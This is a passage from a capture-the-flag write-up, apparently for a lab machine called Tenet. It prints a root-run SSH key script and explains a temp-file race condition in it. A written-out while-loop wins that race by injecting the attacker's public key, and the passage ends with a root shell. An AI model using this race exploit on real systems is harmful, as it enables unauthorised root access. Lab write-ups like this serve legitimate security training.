4 privesc

cat enableSSH.sh
#!/bin/bash

checkAdded() {
        sshName=$(/bin/echo $key | /usr/bin/cut -d " " -f 3)
        if [[ ! -z $(/bin/grep $sshName /root/.ssh/authorized_keys) ]]; then
                /bin/echo "Successfully added $sshName to authorized_keys file!"
        else
                /bin/echo "Error in adding $sshName to authorized_keys file!"
        fi
}
checkFile() {
        if [[ ! -s $1 ]] || [[ ! -f $1 ]]; then
                /bin/echo "Error in creating key file!"
                if [[ -f $1 ]]; then /bin/rm $1; fi
                exit 1
        fi
}
addKey() {
        tmpName=$(mktemp -u /tmp/ssh-XXXXXXXX)
        (umask 110; touch $tmpName)
        /bin/echo $key >>$tmpName
        checkFile $tmpName
        /bin/cat $tmpName >>/root/.ssh/authorized_keys
        /bin/rm $tmpName
}
key="ssh-rsa AAAAA3NzaG1yc2GAAAAGAQAAAAAAAQG+AMU8OGdqbaPP/Ls7bXOa9jNlNzNOgXiQh6ih2WOhVgGjqr2449ZtsGvSruYibxN+MQLG59VkuLNU4NNiadGry0wT7zpALGg2Gl3A0bQnN13YkL3AA8TlU/ypAuocPVZWOVmNjGlftZG9AP656hL+c9RfqvNLVcvvQvhNNbAvzaGR2XOVOVfxt+AmVLGTlSqgRXi6/NyqdzG5Nkn9L/GZGa9hcwM8+4nT43N6N31lNhx4NeGabNx33b25lqermjA+RGWMvGN8siaGskvgaSbuzaMGV9N8umLp6lNo5fqSpiGN8MQSNsXa3xXG+kplLn2W+pbzbgwTNN/w0p+Urjbl root@ubuntu"
addKey
checkAdded

All binaries are using absolute path so we need to understand the code.
- addKey()
	1. creates a temp file  as /tmp/ssh-<something-random>
	2. saves $key in $tmpName
	3. check if properly created
	4. copies the $key (which is $tmpName) into authorized_keys
	5. removes the $tmpName
	
If we can overwrite the file with our own public key, we can ssh in.
# generated using ssh-keygen -f id_rsa

neil@tenet:~$ while true; do echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDTO/tgLW50ljdMpBm23mKHlYNqz1+iY2MCJy1p179VEc3r6POyCUwiVpEjy+PR1rQ2jee2M5VeGUSa9xcrzWTexszGTExWbpT8y68J6+UMUg6Ud1YwBWJo7EF4+8SUeAg+B12g6ygavw5EwZgASnwi3OcpUhEY4+YftyueEbYrkFd5B2NEywarDATJIL3RzeszAOVUuqEip7M9IZ2+LHyLTtiEWvo65UGBxLF+t8gtD3mDMkkUjpnRdKjqbomJfaIhD4V7q6ym/x3dRVL5+8Cl+S25Gc3cH+WWWRUod4hleepK0riVEjZSjJCgUKz87JXlVf+642QUAwQ3XPEsMzG3Chaoa5BKA0NuXKskG5VIZN0RtrVbrxiofcr3WiopttUaepFB7xUYeY+takzDE6gC146XEgc32mmkoZfs7DA6B/RA1ek7oRbeL7vKEJIMz2g4TcNixE4JOpIfC4pyokQ7jQjAZQzDFl+ilpV9PDLhqPLCo5KGLV2+3PspQWvlo0s= kashz@kali" | tee /tmp/ssh* 2> /dev/null; done

# (another terminal window)
neil@tenet:~$ sudo /usr/local/bin/enableSSH.sh
Successfully added root@ubuntu to authorized_keys file!

$ ssh -i id_rsa root@10.10.10.223
root@tenet:~# whoami;id
root
uid=0(root) gid=0(root) groups=0(root)